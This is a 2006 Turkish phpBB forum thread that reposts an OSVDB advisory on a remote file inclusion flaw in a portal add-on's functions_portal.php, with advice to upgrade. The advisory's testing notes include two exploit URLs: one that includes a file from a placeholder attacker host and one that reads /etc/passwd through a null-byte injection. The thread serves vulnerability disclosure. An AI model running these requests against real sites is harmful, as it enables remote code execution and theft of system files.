*edited* 2.0.33 - functions_portal.php / phpbb_root_path Variable Remote File Inclusion

phpBB güvenliği.

*edited* 2.0.33 - functions_portal.php / phpbb_root_path Variable Remote File Inclusion

İleti sabri ünal 19.09.2006, 20:51

eski sürüm *edited* kullananların güncellemesi önerilir

bu arada bu da bir ilk, birileri bizi ciddiye alıyor, anlayın artık

http://www.osvdb.org/displayvuln.php?osvdb_id=28141

OSVDB ID: 28141
Disclosure Date: Aug 24, 2006


Description:
*edited* contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to functions_portal.php not properly sanitizing user input supplied to the 'phpbb_root_path' variable. This may allow an attacker to include a file from a remote host or the local system of the target that contains arbitrary commands which will be executed by the vulnerable script.



Technical Description:
This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

This vulnerability can be exploited to include internal files local to the target system when the magic_quotes_gpc PHP option is 'off'.



Vulnerability Classification:
Remote/Network Access Required
Input Manipulation
Loss Of Integrity
Exploit Available
Web Related


Products:
*edited* *edited* 2.033



Solution:
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.



Manual Testing Notes:
http://[target]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=http://[attacker]/cmd.txt?
http://[target]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=/etc/passwd%00



External References:

Related OSVDB ID: 28140
Secunia Advisory ID: 21602
Vendor URL: http://www.*edited*.net/
Other Advisory URL: http://www.nukedx.com/?viewdoc=48
Mail List Post: http://archives.neohapsis.com/archives/ ... /0624.html


Credit:

Mustafa Can Bjorn - Personal Page


Vulnerability Status:
This entry was last updated on Aug 25, 2006. If you have additional information or corrections for this vulnerability please submit them to OSVDB Moderators.

Direct URL to this page: http://www.osvdb.org/28141
printable version
Mutluyum, biraz komedi takılıyorum! sakın kızmayın yakında geçer, sebebini ben de bilmiyorum! yeni bir aşk da bulmuş değilim!
Kullanıcı avatarı
sabri ünal
Üye
Üye
 
İleti: 1325
Kayıt: 27.10.2005, 15:49
Konum: İstanbul

İleti

ALEXIS
19.09.2006, 22:27

importal/integramod kendi sitesinde hala açık olan sürümü dağıtıyordu en son :?
Kullanıcı avatarı
ALEXIS
Site Yöneticisi
Site Yöneticisi
 
İleti: 2563
Kayıt: 30.06.2005, 09:08


Güvenlik



Kimler çevrimiçi

Bu forumu görüntüleyenler: Kayıtlı kullanıcı yok ve 0 misafir

cron